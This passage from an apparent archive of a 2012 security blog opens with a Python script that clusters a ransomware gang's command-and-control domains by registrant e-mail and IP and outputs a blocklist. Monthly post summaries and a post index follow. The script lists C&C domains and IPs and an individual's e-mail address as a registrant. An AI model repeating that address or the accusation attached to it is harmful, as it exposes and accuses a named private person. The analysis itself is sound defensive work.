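    DomainRecord("quasarnet.co", CNC_IPS, "valter.bars@venezia.pecavvocati.it"),
    DomainRecord("bestconsultingoffice.com", CNC_IPS),
    DomainRecord("apaineal.ru", CNC_IPS),
]

# The C&C domain's resolution history as the post narrates it: (first seen, IP, ASN).
SARSCOWOY_HISTORY = [
    (date(2012, 6, 21), "204.13.160.28", "AS33626"),
    (date(2012, 7, 1), "46.163.113.79", "AS20773"),
    (date(2012, 11, 14), "176.28.14.42", "AS20773"),
    (date(2012, 11, 24), "176.28.22.32", "AS20773"),
]


def cluster_by_email(records: List[DomainRecord]) -> Dict[str, List[str]]:
    """Group domains by registrant e-mail: one address across several names is a pivot."""
    groups: Dict[str, List[str]] = defaultdict(list)
    for rec in records:
        if rec.email:
            groups[rec.email].append(rec.domain)
    return {email: sorted(domains) for email, domains in groups.items()}


def shared_registrants(records: List[DomainRecord], minimum: int = 2) -> Dict[str, List[str]]:
    """Keep only registrant addresses used for at least `minimum` domains."""
    return {e: d for e, d in cluster_by_email(records).items() if len(d) >= minimum}


def cluster_by_ip(records: List[DomainRecord]) -> Dict[str, List[str]]:
    """Group domains by the IP they respond to: co-hosting on a C&C IP is the other pivot."""
    groups: Dict[str, set] = defaultdict(set)
    for rec in records:
        for ip in rec.ips:
            groups[ip].add(rec.domain)
    return {ip: sorted(domains) for ip, domains in groups.items()}


def ip_changes(history):
    """Turn a dated resolution history into (from_ip, to_ip, days_at_from_ip, asn_changed) hops."""
    hops = []
    ordered = sorted(history)
    for (seen0, ip0, asn0), (seen1, ip1, asn1) in zip(ordered, ordered[1:]):
        hops.append((ip0, ip1, (seen1 - seen0).days, asn0 != asn1))
    return hops


def blocklist(records: List[DomainRecord]) -> Tuple[List[str], List[str]]:
    """Flat, de-duplicated domain and IP indicators for a DNS sinkhole or firewall policy."""
    domains = sorted({r.domain for r in records})
    ips = sorted({ip for r in records for ip in r.ips})
    return domains, ips


if __name__ == "__main__":
    for email, domains in shared_registrants(RECORDS).items():
        print(f"{email}: {', '.join(domains)}")
    for src, dst, days, asn_changed in ip_changes(SARSCOWOY_HISTORY):
        print(f"{src} -> {dst} after {days} days" + (" (ASN changed)" if asn_changed else ""))
    domains, ips = blocklist(RECORDS)
    print(f"{len(domains)} domains, {len(ips)} IPs to block")
```

Run as-is it reports the one registrant address reused across three of the listed domains, the three hops the C&C domain made (only the first crossed an ASN boundary; everything since has stayed on AS20773), and the twelve-domain, two-IP block set. The same helpers work unchanged on passive-DNS or WHOIS exports once the records are loaded into `DomainRecord` instances.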

What we've got here is a great example of the following - when you don't fear legal prosecution for your fraudulent activities over a period of several years, earning you potentially hundreds of thousands of dollars, you just launch new projects, continuing to cause more harm and fraudulently obtain funds from infected victims.

For those who are interested in more details on the technical side of this Ransomware, you should [14]consider going through this research.

Hat tip to Steven Adair from [15]Shadowserver for the additional input.
Summarizing ZDNet's Zero Day Posts for November (2012-11-30 15:55)

The following is a brief summary of all of my posts at [1]ZDNet's Zero Day for November, 2012. You can subscribe to [2]Zero Day's main feed, or follow me on Twitter:

01. [3]Opera for Mac OS X patches six security vulnerabilities

02. [4]Cybercriminals start spamvertising Xmas themed scams and malware campaigns

03. [5]Apple releases QuickTime 7.7.3 for Windows, patches critical security vulnerabilities

04. [6]Active XSS flaw discovered on eBay

05. [7]A patched browser - false feeling of security or a security utopia that actually exists?

This post has been reproduced from [8]Dancho Danchev's blog. Follow him [9]on Twitter.
Summarizing Webroot's Threat Blog Posts for November (2012-12-01 00:31)

The following is a brief summary of all of my posts at [1]Webroot's Threat Blog for November, 2012. You can subscribe to my [2]Webroot's Threat Blog RSS Feed or follow me on Twitter:

01. [3]BofA 'Online Banking Passcode Reset' themed emails serve client-side exploits and malware

02. [4]'ADP Immediate Notification' themed emails lead to Black Hole Exploit Kit

03. [5]USPS 'Postal Notification' themed emails lead to malware

04. [6]'Fwd: Scan from a Xerox W. Pro' themed emails lead to Black Hole Exploit Kit

05. [7]'Your Discover Card Services Blockaded' themed emails serve client-side exploits and malware

06. [8]'Payroll Account Holded by Intuit' themed emails lead to Black Hole Exploit Kit

07. [9]'American Express Alert: Your Transaction is Aborted' themed emails serve client-side exploits and malware

08. [10]Cybercriminals abuse major U.S SMS gateways, release DIY Mail-to-SMS flooders

09. [11]'PayPal Account Modified' themed emails lead to Black Hole Exploit Kit

10. [12]Bogus Better Business Bureau themed notifications serve client-side exploits and malware

11. [13]Cybercriminals spamvertise bogus eFax Corporate delivery messages, serve multiple malware variants

12. [14]Bogus IRS 'Your tax return appeal is declined' themed emails lead to malware

13. [15]'Copies of Missing EPLI Policies' themed emails lead to Black Hole Exploit Kit

14. [16]Cybercriminals spamvertise bogus 'Microsoft License Orders' serve client-side exploits and malware

15. [17]Cybercriminals resume spamvertising 'Payroll Account Cancelled by Intuit' themed emails, serve client-side exploits and malware

16. [18]Cybercriminals spamvertise millions of FDIC 'Your activity is discontinued' themed emails, serve client-side exploits and malware

17. [19]Cybercriminals release stealthy DIY mass iFrame injecting Apache 2 modules

18. [20]Multiple 'Inter-company' invoice themed campaigns serve malware and client-side exploits

19. [21]Bogus Facebook 'pending notifications' themed emails serve client-side exploits and malware

20. [22]Cybercriminals target U.K users with bogus 'Pay by Phone Parking Receipts' serve malware

21. [23]Bogus DHL 'Express Delivery Notifications' serve malware

22. [24]Cybercriminals impersonate Vodafone U.K, spread malicious MMS notifications

23. [25]Cybercriminals impersonate T-Mobile U.K, serve malware

24. [26]Bogus 'Meeting Reminder' themed emails serve malware

25. [27]Bogus 'Intuit Software Order Confirmations' lead to Black Hole Exploit Kit

26. [28]Bogus 'End of August Invoices' themed emails serve malware and client-side exploits

This post has been reproduced from [29]Dancho Danchev's blog. Follow him [30]on Twitter.
Upcoming Portfolio of Commercially Available CYBERINT Reports (2012-12-13 13:38)

Valued blog readers,

Over the years, you've been exposed to insightful, in-depth, "God Eye's View" of some of the most prolific, targeted, and trending cyber attacks/cybercriminal schemes, that shaped the way we fight and anticipate cybercrime campaigns throughout the years.

Although the production of such publicly available and socially oriented content at this blog will continue, it's time to raise the stakes even higher - in 2013, I'll be systematically making available commercially available CYBERINT assessments on multiple aspects of the cybercrime ecosystem. It's the stuff that will help your decision-making process, it's the data to help you prosecute those behind these fraudulent operations, it's the tactics and trends you don't get to read about anywhere online.

Please, take 1 second of your precious time, and participate in the voting poll on the right side of the blog.

Enjoy the holidays, and see you all in 2013!

This post has been reproduced from [1]Dancho Danchev's blog. Follow him [2]on Twitter.

2. http://twitter.com/danchodanchev
Dancho Danchev's Blog Most Popular Posts for 2012 (2012-12-28 00:26)

The time has come to reflect on this year's most popular posts, and emphasize the key points about what made them special.

1. [1]Who's Behind the Koobface Botnet? - An OSINT Analysis - Indisputably, the exposing of Koobface botnet master KrotReal is this year's most popular blog post. The release of the post, and the [2]New York Times article discussing the case, immediately resulted in the shutdown of [3]the Koobface botnet.

2. [4]Exposing the Market for Stolen Credit Cards Data - Although the post was originally published in 2011, it's the second most popular for 2012, proving that factually presenting the existence of a growing trend inevitably reaches a wider audience.

3. [5]Dissecting 'Operation Ababil' - an OSINT Analysis - The OSINT analysis of 'Operation Ababil' is this year's third most popular post. The analysis correctly identified a key participant in certain parts of the campaign, although it explicitly emphasized just how easy it is to launch a [6]cyber false flag operation online.

4. [7]Profiling a Vendor of Visa/Mastercard Plastics and Holograms - The main purpose of this post was to shed more light on the increasing availability of "blank plastic" services, whose QA (Quality Assurance) processes sometimes outpace the OPSEC (Operational Security) efforts put in place by the targeted companies.

5. [8]Pricing Scheme for a DDoS Extortion Attack - This post highlighted a bold, but obtained from "in the wild", DDoS extortion letter, indicating the degree of flexibility and professionalism applied by the cybercriminals behind it.

6. [9]A Peek Inside the Vertex Net Loader - This post summarized the key features of the Vertex Net Loader, and emphasized the systematic release of related DIY malware loaders/bots within the cybercrime ecosystem.

7. [10]Dissecting the Ongoing Mass SQL Injection Attack - Regular readers of my personal blog are used to getting the latest threat intelligence regarding a particular widespread campaign, virtually in real-time. That was the main objective of this analysis, fortunately, successfully achieved.

8. [11]Dissecting the Massive SQL Injection Attack Serving Scareware - An ever-green analysis demonstrating monetization of hijacked Web traffic through a scareware affiliate program.

9. [12]Koobface Botnet Master KrotReal Back in Business, Distributes Ransomware And Promotes BHSEO Service/Product - The second post in the series profiling ex-Koobface botnet master KrotReal's cybercrime-friendly operations also gained a lot of attention, and proved that the lack of prosecution in this case can, and will, ultimately lead to more cybercrime-friendly activities.

10. [13]Dissecting 'Operation Ababil' - an OSINT Analysis - Part Two - With 'Operation Ababil' still an open question to many of the major media outlets, the second part of the analysis discussed another tool used in the campaign, with the idea to raise more awareness on the tools and techniques used by the attackers behind the campaign.

Thank you all for being regular blog readers! The best is yet to come! See you all in 2013!

This post has been reproduced from [14]Dancho Danchev's blog. Follow him [15]on Twitter.
■ Compromised Universities Leads to Fraudulent Pharmaceutical Ads (2011-03-16 19:30)

■ Spamvertised United Parcel Service notifications serve malware (2011-03-23 15:54)

■ Spamvertised Post Office Express Mail (USPS) Emails Serving Malware (2011-03-25 18:20)

■ Dissecting the Massive SQL Injection Attack Serving Scareware (2011-03-31 19:54)

■ Spamvertised DHL Notifications Scareware Campaign (2011-04-04 16:44)

■ Summarizing Zero Day's Posts for March (2011-04-04 18:56)

■ Don't Play Poker on an Infected Table - Part Four (2011-04-11 18:10)

■ Spamvertised "Request Rejected" Campaign Serving Scareware (2011-04-12 20:22)

■ Spamvertised "Successful! Order 977132" Leads to Scareware (2011-04-28 14:50)

■ Summarizing ZDNet's Zero Day Posts for April (2011-05-09 12:50)
■ Don't Play Poker on an Infected Table - Part Five (2011-05-09 15:52)

■ A Peek Inside a New DDoS Bot - "Snap" (2011-05-09 17:03)

■ Keeping Money Mule Recruiters on a Short Leash - Part Seven (2011-05-10 12:41)

■ Keeping Money Mule Recruiters on a Short Leash - Part Eight - Historical OSINT (2011-05-25 13:18)

■ A Peek Inside the Vertex Net Loader (2011-05-26 16:34)

■ Keeping Money Mule Recruiters on a Short Leash - Part Nine (2011-05-30 12:09)

o June

■ Summarizing ZDNet's Zero Day Posts for May (2011-06-08 16:24)

o July

■ Summarizing ZDNet's Zero Day Posts for June (2011-07-07 12:24)

■ Keeping Money Mule Recruiters on a Short Leash - Part Ten (2011-07-07 13:25)

o August

■ Summarizing ZDNet's Zero Day Posts for July (2011-08-22 18:06)

■ A Peek Inside Web Malware Exploitation Kits (2011-08-29 13:19)
■ Keeping Money Mule Recruiters on a Short Leash - Part Eleven (2011-08-29 15:51)

o September

■ Summarizing 3 Years of Research Into Cyber Jihad (2011-09-11 13:34)

■ Summarizing ZDNet's Zero Day Posts for August (2011-09-27 19:13)

■ Spamvertised 'Uniform Traffic Ticket' and 'FDIC Notifications' Serving Malware - Historical OSINT (2011-09-28 14:43)

o October

■ Summarizing ZDNet's Zero Day Posts for September (2011-10-04 14:37)

■ Spamvertised "NACHA security nitification" Serving Malware - Historical OSINT (2011-10-04 14:38)

■ Spamvertised "IRS notice" Serving Malware (2011-10-09 19:53)

■ Spamvertised IRS-themed "Last Notice" Emails Serving Malware (2011-10-18 21:45)

■ Dissecting the Ongoing Mass SQL Injection Attack (2011-10-20 23:36)

■ Exposing the Market for Stolen Credit Cards Data (2011-10-31 02:07)

o December

■ Summarizing ZDNet's Zero Day Posts for October (2011-12-04 21:05)

2012

o January
■ Summarizing ZDNet's Zero Day Posts for November (2012-01-01 20:59)

■ Summarizing ZDNet's Zero Day Posts for December (2012-01-01 21:02)

■ Profiling a Vendor of Visa/Mastercard Plastics and Holograms (2012-01-03 20:04)

■ Who's Behind the Koobface Botnet? - An OSINT Analysis (2012-01-09 16:59)

o February

■ Summarizing ZDNet's Zero Day Posts for January (2012-02-02 00:59)

■ Summarizing Webroot's Threat Blog Posts for January (2012-02-02 01:07)

o March

■ Summarizing ZDNet's Zero Day Posts for February (2012-03-07 23:04)

■ Summarizing Webroot's Threat Blog Posts for February (2012-03-07 23:18)

o April

■ Summarizing ZDNet's Zero Day Posts for March (2012-04-09 19:50)

■ Summarizing Webroot's Threat Blog Posts for March (2012-04-09 20:03)

o May

■ Summarizing ZDNet's Zero Day Posts for April (2012-05-08 19:20)

■ Summarizing Webroot's Threat Blog Posts for April (2012-05-08 19:31)

■ Dissecting the Ongoing Client-Side Exploits Serving Lizamoon Mass SQL Injection Attacks (2012-05-08 21:36)
o June

■ Summarizing ZDNet's Zero Day Posts for May (2012-06-06 18:15)

■ Summarizing Webroot's Threat Blog Posts for May (2012-06-06 18:31)

o July

■ Summarizing ZDNet's Zero Day Blog Posts for June (2012-07-10 19:02)

■ Summarizing Webroot's Threat Blog Posts for June (2012-07-10 19:16)

o August

■ Summarizing ZDNet's Zero Day Blog Posts for July (2012-08-23 18:16)

■ Summarizing Webroot's Threat Blog Posts for July (2012-08-23 19:05)

o September

■ Dissecting 'Operation Ababil' - an OSINT Analysis (2012-09-28 00:25)

■ Summarizing ZDNet's Zero Day Posts for August (2012-09-28 01:43)

■ Summarizing Webroot's Threat Blog Posts for August (2012-09-28 01:54)

o October

■ Summarizing Webroot's Threat Blog Posts for September (2012-10-01 14:18)

■ Dissecting 'Operation Ababil' - an OSINT Analysis - Part Two (2012-10-26 15:36)

o November
■ Summarizing ZDNet's Zero Day Posts for October (2012-11-02 01:47)

■ Summarizing Webroot's Threat Blog Posts for October (2012-11-02 02:34)

■ Managed Embedding of Malicious iFrames Through Compromised Accounts as a Service (2012-11-24 00:55)

■ Koobface Botnet Master KrotReal Back in Business, Distributes Ransomware And Promotes BHSEO Service/Product (2012-11-26 03:52)

■ Summarizing ZDNet's Zero Day Posts for November (2012-11-30 15:55)

o December

■ Summarizing Webroot's Threat Blog Posts for November (2012-12-01 00:31)

■ Upcoming Portfolio of Commercially Available CYBERINT Reports (2012-12-13 13:38)

■ Dancho Danchev's Blog Most Popular Posts for 2012 (2012-12-28 00:26)